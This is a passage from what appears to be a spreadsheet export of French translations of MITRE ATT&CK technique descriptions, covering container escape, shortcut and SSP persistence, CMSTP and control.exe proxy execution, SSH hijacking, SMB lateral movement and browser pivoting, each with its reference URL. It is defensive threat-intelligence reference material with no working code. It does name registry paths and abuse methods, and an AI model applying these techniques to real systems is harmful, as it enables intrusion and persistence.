De plus, un adversaire peut être en mesure d’exploiter un conteneur compromis avec un socket de gestion de conteneur monté, tel que « docker.sock », pour sortir du conteneur via une [Container Administration Command](https://attack.mitre.org/techniques/T1609). (Citation : Évasion de conteneur) Les adversaires peuvent également s’échapper via [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068), par exemple en exploitant des vulnérabilités dans des liens symboliques globaux afin d’accéder au répertoire racine d’une machine hôte. (citation : les conteneurs Windows Server sont ouverts)
L’accès à l’hôte peut donner à l’adversaire la possibilité d’atteindre des objectifs ultérieurs, tels que l’établissement de la persistance, le déplacement latéral dans l’environnement, l’accès à d’autres conteneurs exécutés sur l’hôte ou la mise en place d’un canal de commande et de contrôle sur l’hôte.
https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des raccourcis qui peuvent exécuter un programme lors du démarrage du système ou de la connexion de l’utilisateur. Les raccourcis ou les liens symboliques sont utilisés pour référencer d’autres fichiers ou programmes qui seront ouverts ou exécutés lorsque le raccourci est cliqué ou exécuté par un processus de démarrage du système.
Les adversaires peuvent abuser des raccourcis dans le dossier de démarrage pour exécuter leurs outils et obtenir la persistance. (Citation : raccourci pour la persistance ) Bien qu’ils soient souvent utilisés comme charges utiles dans une chaîne d’infection (par exemple, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), les adversaires peuvent également créer un nouveau raccourci comme moyen d’indirection, tout en abusant de [Masquerading](https://attack.mitre.org/techniques/T1036) pour faire passer le raccourci malveillant pour un programme légitime. Les adversaires peuvent également modifier le chemin d’accès cible ou remplacer entièrement un raccourci existant afin que leur logiciel malveillant soit exécuté à la place du programme légitime prévu.
Les raccourcis peuvent également être utilisés à mauvais escient pour établir la persistance en mettant en œuvre d’autres méthodes. Par exemple, les extensions de navigateur LNK peuvent être modifiées (par exemple, [Extensions de navigateur](https://attack.mitre.org/techniques/T1176)) pour lancer constamment des logiciels malveillants.
https://attack.mitre.org/techniques/T1547/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste des fenêtres d’application ouvertes. Les listes de fenêtres peuvent transmettre des informations sur la façon dont le système est utilisé. (Citation : Prevailion DarkWatchman 2021) Par exemple, les informations sur les fenêtres d’application pourraient être utilisées pour identifier les données potentielles à collecter ainsi que pour identifier les outils de sécurité ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) à éviter. (Citation : ESET Grandoreiro avril 2020)
Les adversaires abusent généralement des fonctionnalités du système pour ce type d’énumération. Par exemple, ils peuvent recueillir des informations par le biais de fonctionnalités natives du système telles que les commandes [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059) et les fonctions [API natives](https://attack.mitre.org/techniques/T1106).
https://attack.mitre.org/techniques/T1010</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste d’adresses e-mail et de comptes. Les adversaires peuvent essayer de vider les listes d’adresses Exchange telles que les listes d’adresses globales (GAL). (Citation : Listes d’adresses Microsoft Exchange)
Dans Exchange local et Exchange Online, l’applet de commande PowerShell &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; peut être utilisée pour obtenir des adresses e-mail et des comptes à partir d’un domaine à l’aide d’une session authentifiée. (Citation : Microsoft getglobaladdresslist)(Citation : Black Hills attaquant Exchange MailSniper, 2016)
Dans Google Workspace, la liste d’adresses globale est partagée avec les utilisateurs de Microsoft Outlook via le service Google Workspace Sync for Microsoft Outlook (GWSMO). De plus, l’annuaire Google Workspace permet aux utilisateurs d’obtenir une liste des autres utilisateurs de l’organisation. (Référence : Google Workspace Global Access List)
https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser diverses méthodes temporelles pour détecter et éviter les environnements de virtualisation et d’analyse. Cela peut inclure l’énumération de propriétés basées sur le temps, telles que le temps de fonctionnement ou l’horloge système, ainsi que l’utilisation de minuteries ou d’autres déclencheurs pour éviter un environnement de machine virtuelle (VME) ou un bac à sable, en particulier ceux qui sont automatisés ou ne fonctionnent que pendant une durée limitée.
Les adversaires peuvent utiliser diverses évasions basées sur le temps, telles que le report de la fonctionnalité des logiciels malveillants lors de l’exécution initiale à l’aide de commandes de mise en veille programmatiques ou d’une fonctionnalité de planification système native (ex : [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Les retards peuvent également être basés sur l’attente que des conditions spécifiques de la victime soient remplies (par exemple, le temps du système, les événements, etc.) ou l’utilisation de [canaux en plusieurs étapes](https://attack.mitre.org/techniques/T1104) programmés pour éviter l’analyse et l’examen. (Citation : Sensibilisation à l’environnement de Deloitte)
Des commandes bénignes ou d’autres opérations peuvent également être utilisées pour retarder l’exécution de logiciels malveillants. Des boucles ou des répétitions inutiles de commandes, telles que [Ping](https://attack.mitre.org/software/S0097), peuvent être utilisées pour retarder l’exécution de logiciels malveillants et potentiellement dépasser les seuils de temps des environnements d’analyse automatisée. (Citation : Jour de l’indépendance de Revil)(Citation : Netskope Nitol) Une autre variante, communément appelée martèlement d’API, consiste à effectuer divers appels aux fonctions [API natives](https://attack.mitre.org/techniques/T1106) afin de retarder l’exécution (tout en surchargeant potentiellement les environnements d’analyse avec des données indésirables). (Référence : Joe Sec Nymaim)(Citation : Joe Sec Trickbot)
Les adversaires peuvent également utiliser le temps comme mesure pour détecter les bacs à sable et les environnements d’analyse, en particulier ceux qui tentent de manipuler les mécanismes temporels pour simuler des intervalles de temps plus longs. Par exemple, un adversaire peut être en mesure d’identifier un bac à sable accélérant le temps en échantillonnant et en calculant la valeur attendue de l’horodatage d’un environnement avant et après l’exécution d’une fonction de veille. (Citation : Astuces de logiciels malveillants ISACA)
https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de CMSTP pour proxy l’exécution de code malveillant. Le programme d’installation de profil Microsoft Connection Manager (CMSTP.exe) est un programme de ligne de commande utilisé pour installer les profils de service du Gestionnaire de connexions. (Citation : Microsoft Connection Manager octobre 2009) CMSTP.exe accepte un fichier d’informations d’installation (INF) en tant que paramètre et installe un profil de service utilisé pour les connexions d’accès à distance.
Les adversaires peuvent CMSTP.exe fournir des fichiers INF infectés par des commandes malveillantes. (Citation : Utilisation de Twitter CMSTP janvier 2018) Semblable à [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / « Squiblydoo », CMSTP.exe peut être utilisé de manière abusive pour charger et exécuter des DLL (Citation : MSitPros CMSTP Aug 2017) et/ou des scriptlets COM (SCT) à partir de serveurs distants. (Référence : Twitter CMSTP janvier 2018) (Citation : GitHub Ultimate AppLocker Bypass List) (Référence : Endurant CMSTP juillet 2018) Cette exécution peut également contourner AppLocker et d’autres défenses de contrôle des applications, car CMSTP.exe s’agit d’un fichier binaire légitime qui peut être signé par Microsoft.
CMSTP.exe peut également être utilisé de manière abusive pour [Contourner le contrôle de compte d’utilisateur](https://attack.mitre.org/techniques/T1548/002) et exécuter des commandes arbitraires à partir d’un INF malveillant via une interface COM auto-élevée. (Citation : MSitPros CMSTP août 2017) (Citation : GitHub Ultimate AppLocker Bypass List) (Référence : Endurant CMSTP juillet 2018)
https://attack.mitre.org/techniques/T1218/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent détourner la session SSH d’un utilisateur légitime pour se déplacer latéralement dans un environnement. Secure Shell (SSH) est un moyen standard d’accès à distance sur les systèmes Linux et macOS. Il permet à un utilisateur de se connecter à un autre système via un tunnel chiffré, en s’authentifiant généralement par le biais d’un mot de passe, d’un certificat ou de l’utilisation d’une paire de clés de chiffrement asymétrique.
Afin de se déplacer latéralement à partir d’un hôte compromis, les adversaires peuvent tirer parti des relations de confiance établies avec d’autres systèmes via l’authentification par clé publique dans les sessions SSH actives en détournant une connexion existante vers un autre système. Cela peut se produire en compromettant l’agent SSH lui-même ou en ayant accès au socket de l’agent. Si un adversaire est en mesure d’obtenir un accès root, le détournement de sessions SSH est probablement trivial. (Citation : Slideshare abusant de SSH)(Citation : SSHjack Blackhat)(Citation : Détournement d’agent SSH mécanique)(Citation : Violation Post-mortem SSH Hijack)
[Détournement SSH](https://attack.mitre.org/techniques/T1563/001) diffère de l’utilisation de [SSH](https://attack.mitre.org/techniques/T1021/004) car il détourne une session SSH existante plutôt que de créer une nouvelle session à l’aide de [Comptes valides](https://attack.mitre.org/techniques/T1078).
https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent programmer l’exfiltration de données pour qu’elle ne soit effectuée qu’à certaines heures de la journée ou à certains intervalles. Cela peut être fait pour combiner les modèles de trafic avec une activité ou une disponibilité normale.
Lorsque l’exfiltration programmée est utilisée, d’autres techniques d’exfiltration s’appliquent probablement également pour transférer les informations hors du réseau, telles que [Exfiltration sur le canal C2](https://attack.mitre.org/techniques/T1041) ou [Exfiltration sur un protocole alternatif](https://attack.mitre.org/techniques/T1048).
https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour interagir avec un partage réseau distant à l’aide de Server Message Block (SMB). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
SMB est un protocole de partage de fichiers, d’imprimantes et de ports série pour les machines Windows sur le même réseau ou domaine. Les adversaires peuvent utiliser SMB pour interagir avec les partages de fichiers, ce qui leur permet de se déplacer latéralement sur un réseau. Les implémentations Linux et macOS de SMB utilisent généralement Samba.
Les systèmes Windows ont des partages réseau cachés qui ne sont accessibles qu’aux administrateurs et offrent la possibilité de copier des fichiers à distance et d’autres fonctions administratives. Exemples de partages réseau : « C$ », « ADMIN$ » et « IPC$ ». Les adversaires peuvent utiliser cette technique en conjonction avec des [comptes valides](https://attack.mitre.org/techniques/T1078) de niveau administrateur pour accéder à distance à un système en réseau via SMB, (Citation : Wikipedia Server Message Block) pour interagir avec des systèmes à l’aide d’appels de procédure à distance (RPC),(Citation : TechNet RPC) transférer des fichiers, et exécuter des fichiers binaires transférés via l’exécution à distance. Des exemples de techniques d’exécution qui reposent sur des sessions authentifiées via SMB/RPC sont [Tâche/Travail planifié](https://attack.mitre.org/techniques/T1053), [Exécution de service](https://attack.mitre.org/techniques/T1569/002) et [Instrumentation de gestion Windows](https://attack.mitre.org/techniques/T1047). Les adversaires peuvent également utiliser des hachages NTLM pour accéder aux partages d’administrateur sur les systèmes avec [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) et certains niveaux de configuration et de correctif. (citation : Microsoft Admin Shares)
https://attack.mitre.org/techniques/T1021/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent implanter des images de cloud ou de conteneur avec un code malveillant pour établir la persistance après avoir accédé à un environnement. Les images Amazon Web Services (AWS), Amazon Machine Images (AMI), Google Cloud Platform (GCP) et Azure Images, ainsi que les environnements d’exécution de conteneurs populaires tels que Docker, peuvent être implantés ou dérobés. Contrairement à [Upload Malware](https://attack.mitre.org/techniques/T1608/001), cette technique se concentre sur l’implantation d’une image par des adversaires dans un registre au sein de l’environnement d’une victime. Selon la façon dont l’infrastructure est provisionnée, cela peut fournir un accès persistant si l’outil de provisionnement de l’infrastructure est chargé d’utiliser toujours la dernière image. (Citation : Rhino Labs Cloud Image Backdoor Technique, septembre 2019)
Un outil a été développé pour faciliter la plantation de portes dérobées dans les images de conteneurs de nuages. (Citation : Rhino Labs Cloud Backdoor, septembre 2019) Si un adversaire a accès à une instance AWS compromise et est autorisé à répertorier les images de conteneur disponibles, il peut implanter une porte dérobée telle qu’un [Web Shell](https://attack.mitre.org/techniques/T1505/003). (Citation : Rhino Labs Cloud Image Backdoor Technique, septembre 2019)
https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>Les adversaires peuvent tunneliser les communications réseau vers et depuis un système victime au sein d’un protocole distinct pour éviter la détection/le filtrage du réseau et/ou permettre l’accès à des systèmes autrement inaccessibles. Le tunneling consiste à encapsuler explicitement un protocole dans un autre. Ce comportement peut dissimuler le trafic malveillant en se fondant dans le trafic existant et/ou fournir une couche externe de cryptage (similaire à un VPN). Le tunneling peut également permettre le routage de paquets réseau qui n’atteindraient pas leur destination prévue, tels que SMB, RDP ou d’autres trafics qui seraient filtrés par des appliances réseau ou qui ne seraient pas acheminés via Internet. 
Il existe différentes façons d’encapsuler un protocole dans un autre protocole. Par exemple, les adversaires peuvent effectuer un tunneling SSH (également connu sous le nom de transfert de port SSH), qui implique le transfert de données arbitraires via un tunnel SSH crypté. (Citation : Tunneling SSH) 
[Tunneling de protocole](https://attack.mitre.org/techniques/T1572) peut également être abusé par des adversaires pendant la [Résolution dynamique](https://attack.mitre.org/techniques/T1568). Connu sous le nom de DNS over HTTPS (DoH), les requêtes visant à résoudre l’infrastructure C2 peuvent être encapsulées dans des paquets HTTPS chiffrés. (Citation : BleepingComp Godlua JUL19) 
Les adversaires peuvent également exploiter le [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) en conjonction avec le [Proxy](https://attack.mitre.org/techniques/T1090) et/ou le [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) pour dissimuler davantage les communications et l’infrastructure C2.
https://attack.mitre.org/techniques/T1572</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de control.exe pour l’exécution par proxy de charges utiles malveillantes. Le processus binaire (control.exe) du Panneau de configuration Windows gère l’exécution des éléments du Panneau de configuration, qui sont des utilitaires qui permettent aux utilisateurs d’afficher et d’ajuster les paramètres de l’ordinateur.
Les éléments du Panneau de configuration sont des fichiers exécutables (.exe) ou .cpl enregistrés du Panneau de configuration, ces derniers étant en fait des fichiers de bibliothèque de liens dynamiques (.dll) renommés qui exportent une fonction &lt;code&gt;CPlApplet&lt;/code&gt;. (Citation : Microsoft implémentant CPL)(Citation : TrendMicro CPL Malware janvier 2014) Pour faciliter l’utilisation, les éléments du Panneau de configuration incluent généralement des menus graphiques disponibles pour les utilisateurs après avoir été enregistrés et chargés dans le Panneau de configuration. (Citation : Microsoft implémentant CPL) Les éléments du Panneau de configuration peuvent être exécutés directement à partir de la ligne de commande, par programmation via un appel d’interface de programmation d’application (API) ou en double-cliquant simplement sur le fichier. (Citation : Microsoft implémentant CPL) (Citation : TrendMicro CPL Malware janvier 2014)(Citation : TrendMicro CPL Malware décembre 2013)
Les éléments malveillants du panneau de configuration peuvent être diffusés via des campagnes [Phishing](https://attack.mitre.org/techniques/T1566) (Citation : TrendMicro CPL Malware Jan 2014)(Citation : TrendMicro CPL Malware Dec 2013) ou exécutés dans le cadre d’un malware en plusieurs étapes. (Citation : Palo Alto Reaver novembre 2017) Les éléments du Panneau de configuration, en particulier les fichiers CPL, peuvent également contourner les listes d’applications et/ou d’extensions de fichiers autorisées.
Les adversaires peuvent également renommer les fichiers DLL malveillants (.dll) avec les extensions de fichier du Panneau de configuration (.cpl) et les enregistrer dans &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Même lorsque ces DLL enregistrées ne sont pas conformes à la spécification du fichier CPL et n’exportent pas les fonctions &lt;code&gt;CPlApplet&lt;/code&gt;, elles sont chargées et exécutées via son &lt;code&gt;DllEntryPoint&lt;/code&gt; lors de l’exécution du Panneau de configuration. Les fichiers CPL qui n’exportent pas &lt;code&gt;CPlApplet&lt;/code&gt; ne sont pas directement exécutables. (Citation : ESET InvisiMole, juin 2020)
https://attack.mitre.org/techniques/T1218/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent franchir les limites du réseau en modifiant la configuration NAT (Network Address Translation) d’un périphérique réseau. Les modifications malveillantes apportées au NAT peuvent permettre à un adversaire de contourner les restrictions sur le routage du trafic qui séparent autrement les réseaux approuvés et non approuvés.
Les périphériques réseau tels que les routeurs et les pare-feu qui connectent plusieurs réseaux peuvent implémenter NAT pendant le processus de transmission de paquets entre les réseaux. Lors de l’exécution de NAT, le périphérique réseau réécrit les adresses source et/ou de destination de l’en-tête de l’adresse IP. Certaines conceptions de réseau nécessitent un NAT pour que les paquets traversent le périphérique frontalier.  Un exemple typique de cela est les environnements où les réseaux internes utilisent des adresses non routables sur Internet. (Référence : RFC1918)
Lorsqu’un adversaire prend le contrôle d’un périphérique de limite de réseau, il peut soit exploiter les configurations NAT existantes pour envoyer le trafic entre deux réseaux séparés, soit mettre en œuvre des configurations NAT de sa propre conception.  Dans le cas de conceptions de réseau qui nécessitent un NAT pour fonctionner, cela permet à l’adversaire de surmonter les limitations de routage inhérentes qui l’empêcheraient normalement d’accéder aux systèmes protégés derrière le périphérique de bordure.  Dans le cas de conceptions de réseau qui ne nécessitent pas de NAT, la traduction d’adresses peut être utilisée par les adversaires pour masquer leurs activités, car la modification des adresses des paquets qui traversent un périphérique de frontière réseau peut rendre la surveillance des transmissions de données plus difficile pour les défenseurs.  
Les adversaires peuvent utiliser [Patch System Image](https://attack.mitre.org/techniques/T1601/001) pour modifier le système d’exploitation d’un périphérique réseau, en mettant en œuvre leurs propres mécanismes NAT personnalisés afin de masquer davantage leurs activités
https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent télécharger des outils sur une infrastructure tierce ou contrôlée par l’adversaire pour les rendre accessibles pendant le ciblage. Les outils peuvent être open source ou fermés, gratuits ou commerciaux. Les outils peuvent être utilisés à des fins malveillantes par un adversaire, mais (contrairement aux logiciels malveillants) n’ont pas été conçus pour être utilisés à ces fins (ex : [PsExec](https://attack.mitre.org/software/S0029)). Les adversaires peuvent télécharger des outils pour soutenir leurs opérations, par exemple en mettant un outil à la disposition d’un réseau victime pour permettre le [transfert d’outils d’entrée](https://attack.mitre.org/techniques/T1105) en le plaçant sur un serveur Web accessible sur Internet.
Les outils peuvent être placés sur une infrastructure qui a déjà été achetée/louée par l’adversaire ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou qui a été compromise par celui-ci ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)). (Référence : Dell TG-3390) Les outils peuvent également être mis en scène sur des services web, tels qu’un dépôt GitHub contrôlé par un adversaire, ou sur des offres Platform-as-a-Service qui permettent aux utilisateurs de provisionner facilement des applications. (Citation : Trou d’eau de Dragos Heroku)(Citation : Malwarebytes Heroku Skimmers)(Citation : Intezer App Service Phishing)
Les adversaires peuvent éviter d’avoir à télécharger un outil en demandant aux machines victimes compromises de télécharger l’outil directement à partir d’un emplacement d’hébergement tiers (par exemple, un dépôt GitHub non contrôlé par l’adversaire), y compris le site d’hébergement d’origine de l’outil.
https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fournisseurs de support de sécurité (SSP) pour exécuter des DLL au démarrage du système. Les DLL SSP Windows sont chargées dans le processus LSA (Local Security Authority) au démarrage du système. Une fois chargées dans le LSA, les DLL SSP ont accès aux mots de passe chiffrés et en texte brut qui sont stockés dans Windows, tels que le mot de passe de domaine ou les codes confidentiels de carte à puce de tout utilisateur connecté.
La configuration SSP est stockée dans deux clés de registre : &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; et &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. Un adversaire peut modifier ces clés de registre pour ajouter de nouveaux SSP, qui seront chargés au prochain démarrage du système ou lors de l’appel de la fonction d’API Windows AddSecurityPackage. (Citation : Graeber 2014)
https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser d’autres éléments d’authentification, tels que des hachages de mot de passe, des tickets Kerberos et des jetons d’accès aux applications, afin de se déplacer latéralement dans un environnement et de contourner les contrôles d’accès au système normaux. 
Les processus d’authentification nécessitent généralement une identité valide (par exemple, un nom d’utilisateur) ainsi qu’un ou plusieurs facteurs d’authentification (par exemple, un mot de passe, un code PIN, une carte à puce physique, un générateur de jetons, etc.). Un autre élément d’authentification est légitimement généré par les systèmes après qu’un utilisateur ou une application s’est authentifié avec succès en fournissant une identité valide et le ou les facteurs d’authentification requis. D’autres éléments d’authentification peuvent également être générés au cours du processus de création de l’identité. (Citation : Authentification NIST)(Citation : NIST MFA)
La mise en cache d’un autre matériel d’authentification permet au système de vérifier qu’une identité a été authentifiée avec succès sans demander à l’utilisateur de saisir à nouveau le ou les facteurs d’authentification. Étant donné que l’authentification alternative doit être conservée par le système, en mémoire ou sur disque, elle peut être exposée au risque d’être volée par le biais des techniques [Credential Access](https://attack.mitre.org/tactics/TA0006). En volant d’autres éléments d’authentification, les adversaires sont en mesure de contourner les contrôles d’accès au système et de s’authentifier auprès des systèmes sans connaître le mot de passe en clair ou tout autre facteur d’authentification.
https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des données privées auprès de fournisseurs de renseignements sur les menaces pour trouver des informations qui peuvent être utilisées lors du ciblage. Les fournisseurs de renseignements sur les menaces peuvent proposer des flux payants ou des portails qui offrent plus de données que ce qui est publié publiquement. Bien que des détails sensibles (tels que les noms des clients et d’autres identifiants) puissent être caviardés, ces informations peuvent contenir des tendances concernant des violations telles que les secteurs cibles, les réclamations d’attribution et les TTP/contre-mesures réussies. (Citation : D3Secutrity CTI Feeds)
Les adversaires peuvent effectuer des recherches dans les données privées des fournisseurs de renseignements sur les menaces pour recueillir des informations exploitables. Les auteurs de menace peuvent chercher à obtenir des renseignements ou des indicateurs sur leurs propres campagnes, ainsi que sur celles menées par d’autres adversaires, qui peuvent s’aligner sur leurs secteurs cibles, leurs capacités et leurs objectifs ou sur d’autres préoccupations opérationnelles. Les informations rapportées par les fournisseurs peuvent également révéler des opportunités d’autres formes de reconnaissance (ex : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Exploiter une application publique](https://attack.mitre.org/techniques/T1190) ou [Externe distant Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1597/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’exfiltrer des données sur un support de réseau différent de celui du canal de commande et de contrôle. Si le réseau de commande et de contrôle est une connexion Internet filaire, l’exfiltration peut se produire, par exemple, via une connexion WiFi, un modem, une connexion de données cellulaires, Bluetooth ou un autre canal de radiofréquence (RF).
Les adversaires peuvent choisir de le faire s’ils disposent d’un accès ou d’une proximité suffisants, et la connexion peut ne pas être sécurisée ou défendue aussi bien que le canal principal connecté à Internet, car il n’est pas acheminé via le même réseau d’entreprise.
https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux fichiers de configuration réseau pour collecter des données sensibles sur l’appareil et le réseau. La configuration réseau est un fichier contenant des paramètres qui déterminent le fonctionnement de l’appareil. L’appareil stocke généralement une copie en mémoire de la configuration pendant son fonctionnement, ainsi qu’une configuration distincte sur un stockage non volatile à charger après la réinitialisation de l’appareil. Les adversaires peuvent inspecter les fichiers de configuration pour révéler des informations sur le réseau cible et sa disposition, le périphérique réseau et ses logiciels, ou identifier des comptes légitimes et des informations d’identification pour une utilisation ultérieure.
Les adversaires peuvent utiliser des outils et des protocoles de gestion courants, tels que SNMP (Simple Network Management Protocol) et SMI (Smart Install), pour accéder aux fichiers de configuration réseau. (Référence : US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation : Blog Cisco Legacy Device Attacks) Ces outils peuvent être utilisés pour interroger des données spécifiques à partir d’un référentiel de configuration ou configurer l’appareil pour exporter la configuration en vue d’une analyse ultérieure.
https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur l’identité de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les identités peuvent inclure divers détails, y compris des données personnelles (par exemple, les noms des employés, les adresses e-mail, les réponses aux questions de sécurité, etc.) ainsi que des détails sensibles tels que des informations d’identification ou des configurations d’authentification multifacteur (MFA).
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les informations sur les utilisateurs peuvent également être énumérées par d’autres moyens actifs (c’est-à-dire [l’analyse active](https://attack.mitre.org/techniques/T1595)), tels que l’exploration et l’analyse des réponses des services d’authentification qui peuvent révéler des noms d’utilisateur valides dans un système ou les méthodes MFA autorisées associées à ces noms d’utilisateur. (Citation : GrimBlog Nom d’utilisateurEnum)(Citation : Abus d’obsidienne SSPR 2023) Les informations sur les victimes peuvent également être exposées à des adversaires par le biais d’Internet ou d’autres ensembles de données accessibles (ex : [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Rechercher des sites Web appartenant aux victimes](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite OPM)(Référence : Registre Deloitte)(Citation : Enregistrer Uber)(Citation : Detectify Slack Tokens)(Citation : Forbes GitHub Creds)(Citation : GitHub truffleHog)(Citation : GitHub Gitrob)(Citation : CNET Leaks)
La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Comptes compromis](https://attack.mitre.org/techniques/T1586)), et/ou l’accès initial (ex : [Phishing](https://attack.mitre.org/techniques/T1566) ou [Comptes valides]( https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver ou modifier les pare-feu du système afin de contourner les contrôles limitant l’utilisation du réseau. Il peut s’agir de désactiver l’ensemble du mécanisme ainsi que d’ajouter, de supprimer ou de modifier des règles particulières. Cela peut être fait de plusieurs façons en fonction du système d’exploitation, notamment via la ligne de commande, la modification des clés de registre Windows et le Panneau de configuration Windows.
La modification ou la désactivation d’un pare-feu système peut permettre des communications C2 adverses, des mouvements latéraux et/ou l’exfiltration de données qui ne seraient pas autorisés autrement. Par exemple, les adversaires peuvent ajouter une nouvelle règle de pare-feu pour un protocole bien connu (tel que RDP) à l’aide d’un port non traditionnel et potentiellement moins sécurisé (c’est-à-dire [port non standard](https://attack.mitre.org/techniques/T1571)). (Référence : change_rdp_port_conti)
Les adversaires peuvent également modifier les paramètres de mise en réseau de l’hôte qui manipulent indirectement les pare-feu du système, tels que la bande passante de l’interface ou les seuils de demande de connexion réseau. (Citation : Chasseresse BlackCat) Les paramètres liés à l’activation de l’utilisation abusive de divers [Services à distance](https://attack.mitre.org/techniques/T1021) peuvent également modifier indirectement les règles du pare-feu.
https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>Un adversaire peut compresser et/ou chiffrer les données collectées avant l’exfiltration. La compression des données peut aider à obscurcir les données collectées et à minimiser la quantité de données envoyées sur le réseau. (Citation : Acte d’accusation du DOJ GRU, juillet 2018) Le chiffrement peut être utilisé pour masquer les informations qui sont exfiltrées ou pour rendre l’exfiltration moins visible lors de l’inspection par un défenseur.
La compression et le chiffrement sont effectués avant l’exfiltration et peuvent être effectués à l’aide d’un utilitaire, d’une bibliothèque tierce ou d’une méthode personnalisée.
https://attack.mitre.org/techniques/T1560</t>
  </si>
  <si>
    <t>Les adversaires peuvent tirer parti des failles de sécurité et des fonctionnalités inhérentes aux logiciels de navigation pour modifier le contenu, modifier les comportements des utilisateurs et intercepter des informations dans le cadre de diverses techniques de piratage de session de navigateur. (citation : Wikipédia Man dans le navigateur)
Par exemple, lorsqu’un adversaire injecte dans un navigateur un logiciel qui lui permet d’hériter des cookies, des sessions HTTP et des certificats clients SSL d’un utilisateur, puis d’utiliser le navigateur comme moyen de pivoter vers un intranet authentifié. (Citation : Cobalt Strike Browser Pivot)(Citation : Extensions Chrome ICEBRG) L’exécution de comportements basés sur le navigateur, tels que le pivotement, peut nécessiter des autorisations de processus spécifiques, telles que &lt;code&gt;SeDebugPrivilege&lt;/code&gt; et/ou des droits d’intégrité/d’administrateur élevés.
Un autre exemple consiste à faire pivoter le trafic du navigateur de l’adversaire vers le navigateur de l’utilisateur en mettant en place un proxy qui redirigera le trafic Web. Cela ne modifie en rien le trafic de l’utilisateur, et la connexion proxy peut être rompue dès que le navigateur est fermé. L’adversaire prend en charge le contexte de sécurité du processus de navigateur dans lequel le proxy est injecté. Les navigateurs créent généralement un nouveau processus pour chaque onglet ouvert, et les autorisations et les certificats sont séparés en conséquence. Avec ces autorisations, un adversaire pourrait potentiellement accéder à n’importe quelle ressource d’un intranet, telle que [Sharepoint](https://attack.mitre.org/techniques/T1213/002) ou la messagerie Web, qui est accessible via le navigateur et pour laquelle le navigateur dispose d’autorisations suffisantes. Le pivotement du navigateur peut également contourner la sécurité fournie par l’authentification à 2 facteurs. (Citation : manuel de frappe de cobalt)
https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour se connecter à un service qui accepte les connexions à distance, tel que telnet, SSH et VNC. L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
